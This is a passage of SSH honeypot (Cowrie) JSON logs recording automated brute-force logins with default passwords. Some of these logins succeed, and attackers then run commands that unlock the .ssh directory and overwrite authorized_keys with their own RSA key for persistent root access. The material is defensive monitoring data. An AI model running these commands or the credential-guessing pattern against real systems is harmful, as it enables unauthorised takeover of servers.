mac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:17:30.947444Z","src_ip":"212.227.125.160","session":"e62b2cfe6eee"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-28T11:17:31.464734Z","src_ip":"212.227.125.160","session":"e62b2cfe6eee"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:17:32.631648Z","src_ip":"212.227.125.160","session":"e62b2cfe6eee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:17:54.001059Z","src_ip":"176.65.148.28","session":"231db660d72d"}
{"eventid":"cowrie.session.closed","duration":180.06611680984497,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:17:54.004479Z","src_ip":"176.65.148.28","session":"231db660d72d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50870,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3aa188bf385","protocol":"ssh","message":"New connection: 217.72.205.35:50870 (1.2.3.4:22) [session: a3aa188bf385]","sensor":"my-vps","timestamp":"2025-08-28T11:18:00.391879Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:18:00.393163Z","src_ip":"217.72.205.35","session":"a3aa188bf385"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55626,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ea2bbfa7927","protocol":"ssh","message":"New connection: 212.227.125.160:55626 (1.2.3.4:22) [session: 5ea2bbfa7927]","sensor":"my-vps","timestamp":"2025-08-28T11:18:13.575727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:18:13.576611Z","src_ip":"212.227.125.160","session":"5ea2bbfa7927"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:18:13.826607Z","src_ip":"212.227.125.160","session":"5ea2bbfa7927"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":39012,"dst_ip":"1.2.3.4","dst_port":22,"session":"838d696c1f94","protocol":"ssh","message":"New connection: 27.112.79.123:39012 (1.2.3.4:22) [session: 838d696c1f94]","sensor":"my-vps","timestamp":"2025-08-28T11:18:14.261611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:18:14.267374Z","src_ip":"27.112.79.123","session":"838d696c1f94"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T11:18:14.346887Z","src_ip":"212.227.125.160","session":"5ea2bbfa7927"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:18:14.527753Z","src_ip":"27.112.79.123","session":"838d696c1f94"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:18:15.542188Z","src_ip":"212.227.125.160","session":"5ea2bbfa7927"}
{"eventid":"cowrie.login.failed","username":"root/admin","password":"123456","message":"login attempt [root/admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T11:18:15.586796Z","src_ip":"27.112.79.123","session":"838d696c1f94"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:18:16.851084Z","src_ip":"27.112.79.123","session":"838d696c1f94"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:18:23.683746Z","src_ip":"212.227.235.229","session":"8058dd6105ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:18:23.685182Z","src_ip":"212.227.235.229","session":"8058dd6105ee"}
{"eventid":"cowrie.session.closed","duration":"64.9","message":"Connection lost after 64.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:18:23.686750Z","src_ip":"212.227.235.229","session":"8058dd6105ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46832,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7992f39b3e0","protocol":"ssh","message":"New connection: 212.227.125.160:46832 (1.2.3.4:22) [session: e7992f39b3e0]","sensor":"my-vps","timestamp":"2025-08-28T11:18:55.124257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:18:55.124928Z","src_ip":"212.227.125.160","session":"e7992f39b3e0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:18:55.418047Z","src_ip":"212.227.125.160","session":"e7992f39b3e0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T11:18:56.146799Z","src_ip":"212.227.125.160","session":"e7992f39b3e0"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:18:57.318938Z","src_ip":"212.227.125.160","session":"e7992f39b3e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42448,"dst_ip":"1.2.3.4","dst_port":22,"session":"11d4a38b9828","protocol":"ssh","message":"New connection: 212.227.235.229:42448 (1.2.3.4:22) [session: 11d4a38b9828]","sensor":"my-vps","timestamp":"2025-08-28T11:19:02.831810Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:19:02.832684Z","src_ip":"212.227.235.229","session":"11d4a38b9828"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:19:03.065274Z","src_ip":"212.227.235.229","session":"11d4a38b9828"}
{"eventid":"cowrie.login.success","username":"root","password":"Mm12345","message":"login attempt [root/Mm12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:19:04.039850Z","src_ip":"212.227.235.229","session":"11d4a38b9828"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:19:05.022805Z","src_ip":"212.227.235.229","session":"11d4a38b9828"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:19:05.023506Z","src_ip":"212.227.235.229","session":"11d4a38b9828"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:19:05.024891Z","src_ip":"212.227.235.229","session":"11d4a38b9828"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:19:05.257541Z","src_ip":"212.227.235.229","session":"11d4a38b9828"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":43134,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9b8819ec36b","protocol":"ssh","message":"New connection: 27.112.79.123:43134 (1.2.3.4:22) [session: a9b8819ec36b]","sensor":"my-vps","timestamp":"2025-08-28T11:19:31.073249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:19:31.074154Z","src_ip":"27.112.79.123","session":"a9b8819ec36b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:19:31.346226Z","src_ip":"27.112.79.123","session":"a9b8819ec36b"}
{"eventid":"cowrie.login.success","username":"root","password":"Support@2025","message":"login attempt [root/Support@2025] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:19:32.466410Z","src_ip":"27.112.79.123","session":"a9b8819ec36b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:19:33.025936Z","src_ip":"27.112.79.123","session":"a9b8819ec36b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:19:33.026761Z","src_ip":"27.112.79.123","session":"a9b8819ec36b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:19:33.028263Z","src_ip":"27.112.79.123","session":"a9b8819ec36b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:19:33.300728Z","src_ip":"27.112.79.123","session":"a9b8819ec36b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:19:33.908219Z","src_ip":"27.112.79.123","session":"a9b8819ec36b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:19:33.908878Z","src_ip":"27.112.79.123","session":"a9b8819ec36b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:19:34.187740Z","src_ip":"27.112.79.123","session":"a9b8819ec36b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:19:34.188775Z","src_ip":"27.112.79.123","session":"a9b8819ec36b"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":43150,"dst_ip":"1.2.3.4","dst_port":22,"session":"3319fe74802c","protocol":"ssh","message":"New connection: 27.112.79.123:43150 (1.2.3.4:22) [session: 3319fe74802c]","sensor":"my-vps","timestamp":"2025-08-28T11:19:34.449775Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:19:34.450919Z","src_ip":"27.112.79.123","session":"3319fe74802c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:19:34.721734Z","src_ip":"27.112.79.123","session":"3319fe74802c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55058,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3b0a9fc5693","protocol":"ssh","message":"New connection: 212.227.125.160:55058 (1.2.3.4:22) [session: b3b0a9fc5693]","sensor":"my-vps","timestamp":"2025-08-28T11:19:35.660787Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:19:35.662511Z","src_ip":"212.227.125.160","session":"b3b0a9fc5693"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:19:35.833846Z","src_ip":"212.227.125.160","session":"b3b0a9fc5693"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:19:35.847223Z","src_ip":"27.112.79.123","session":"3319fe74802c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","message":"login attempt [admin/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T11:19:36.343581Z","src_ip":"212.227.125.160","session":"b3b0a9fc5693"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:19:37.118415Z","src_ip":"27.112.79.123","session":"3319fe74802c"}
